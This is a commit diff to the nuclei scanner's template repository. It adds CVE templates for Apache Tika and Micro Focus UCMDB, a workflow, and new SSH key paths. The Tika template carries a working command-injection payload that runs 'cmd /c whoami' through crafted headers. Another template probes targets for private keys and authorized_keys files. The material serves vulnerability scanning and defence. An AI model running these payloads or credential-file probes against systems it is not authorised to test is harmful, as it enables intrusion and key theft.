commit
32e1cece4f
|
@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc
|
||||||
|
|
||||||
| Templates | Counts | Templates | Counts | Templates | Counts |
|
| Templates | Counts | Templates | Counts | Templates | Counts |
|
||||||
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
| -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ |
|
||||||
| cves | 207 | vulnerabilities | 102 | exposed-panels | 74 |
|
| cves | 210 | vulnerabilities | 102 | exposed-panels | 80 |
|
||||||
| exposures | 55 | technologies | 48 | misconfiguration | 49 |
|
| exposures | 55 | technologies | 48 | misconfiguration | 49 |
|
||||||
| workflows | 22 | miscellaneous | 16 | default-logins | 14 |
|
| workflows | 23 | miscellaneous | 16 | default-logins | 14 |
|
||||||
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
| exposed-tokens | 9 | dns | 6 | fuzzing | 4 |
|
||||||
| helpers | 2 | takeovers | 1 | - | - |
|
| helpers | 2 | takeovers | 1 | - | - |
|
||||||
|
|
||||||
**65 directories, 618 files**.
|
**65 directories, 628 files**.
|
||||||
|
|
||||||
</td>
|
</td>
|
||||||
</tr>
|
</tr>
|
||||||
|
|
|
@ -0,0 +1,40 @@
|
||||||
|
id: CVE-2018-1335
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Tika 1.15-1.17 Header Command Injection
|
||||||
|
author: pikpikcu
|
||||||
|
severity: critical
|
||||||
|
reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
|
||||||
|
edb: https://www.exploit-db.com/exploits/47208
|
||||||
|
tags: cve,cve2018,apache,tika,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: PUT
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/meta"
|
||||||
|
headers:
|
||||||
|
X-Tika-OCRTesseractPath: cscript
|
||||||
|
X-Tika-OCRLanguage: //E:Jscript
|
||||||
|
Expect: 100-continue
|
||||||
|
Content-type: image/jp2
|
||||||
|
Connection: close
|
||||||
|
body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Content-Type: text/csv"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "org.apache.tika.parser.DefaultParser"
|
||||||
|
- "org.apache.tika.parser.gdal.GDALParse"
|
||||||
|
part: body
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-11853
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Micro Focus Operation Bridge Manager RCE
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: high
|
||||||
|
reference: http://packetstormsecurity.com/files/161366/Micro-Focus-Operations-Bridge-Manager-Remote-Code-Execution.html
|
||||||
|
description: |
|
||||||
|
This template supports the detection part only.
|
||||||
|
|
||||||
|
UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
|
||||||
|
but this template can probably also be used to detect Operations Bridge Manager
|
||||||
|
(containeirized) and Application Performance Management.
|
||||||
|
|
||||||
|
Originated from Metasploit module (#14654).
|
||||||
|
tags: cve,cve2020,opm,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ucmdb-api/connect"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "HttpUcmdbServiceProviderFactoryImpl"
|
||||||
|
- "ServerVersion=11.6.0"
|
||||||
|
part: body
|
||||||
|
condition: and
|
|
@ -0,0 +1,32 @@
|
||||||
|
id: CVE-2020-11854
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Micro Focus UCMDB RCE
|
||||||
|
author: dwisiswant0
|
||||||
|
severity: critical
|
||||||
|
reference: http://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.html
|
||||||
|
description: |
|
||||||
|
This template supports the detection part only.
|
||||||
|
|
||||||
|
UCMDB included in versions 2020.05 and below of Operations Bridge Manager are affected,
|
||||||
|
but this template can probably also be used to detect Operations Bridge Manager
|
||||||
|
(containeirized) and Application Performance Management.
|
||||||
|
|
||||||
|
Originated from Metasploit module (#14654).
|
||||||
|
tags: cve,cve2020,ucmdb,rce
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/ucmdb-api/connect"
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "HttpUcmdbServiceProviderFactoryImpl"
|
||||||
|
- "ServerVersion=11.6.0"
|
||||||
|
part: body
|
||||||
|
condition: and
|
|
@ -18,6 +18,10 @@ requests:
|
||||||
- "{{BaseURL}}/id_dsa"
|
- "{{BaseURL}}/id_dsa"
|
||||||
- "{{BaseURL}}/.ssh/id_rsa"
|
- "{{BaseURL}}/.ssh/id_rsa"
|
||||||
- "{{BaseURL}}/.ssh/id_dsa"
|
- "{{BaseURL}}/.ssh/id_dsa"
|
||||||
|
- "{{BaseURL}}/.ssh/known_hosts.old"
|
||||||
|
- "{{BaseURL}}/.ssh/authorized_keys"
|
||||||
|
- "{{BaseURL}}/_/.ssh/authorized_keys"
|
||||||
|
- "{{BaseURL}}/.ssh/known_hosts"
|
||||||
- "{{BaseURL}}/{{Hostname}}.key"
|
- "{{BaseURL}}/{{Hostname}}.key"
|
||||||
- "{{BaseURL}}/{{Hostname}}.pem"
|
- "{{BaseURL}}/{{Hostname}}.pem"
|
||||||
|
|
||||||
|
@ -31,6 +35,7 @@ requests:
|
||||||
- "BEGIN DSA PRIVATE KEY"
|
- "BEGIN DSA PRIVATE KEY"
|
||||||
- "BEGIN EC PRIVATE KEY"
|
- "BEGIN EC PRIVATE KEY"
|
||||||
- "BEGIN PGP PRIVATE KEY BLOCK"
|
- "BEGIN PGP PRIVATE KEY BLOCK"
|
||||||
|
- "ssh-rsa"
|
||||||
condition: or
|
condition: or
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
|
|
|
@ -0,0 +1,11 @@
|
||||||
|
id: micro-focus-workflow
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Micro Focus Checks
|
||||||
|
author: dwisiswant0
|
||||||
|
description: A simple workflow that runs all Micro Focus related nuclei templates on a given target.
|
||||||
|
|
||||||
|
workflows:
|
||||||
|
- template: default-logins/UCMDB/micro-focus-ucmdb-default-credentials.yaml
|
||||||
|
- template: cves/2020/CVE-2020-11853.yaml
|
||||||
|
- template: cves/2020/CVE-2020-11854.yaml
|
Loading…
Reference in New Issue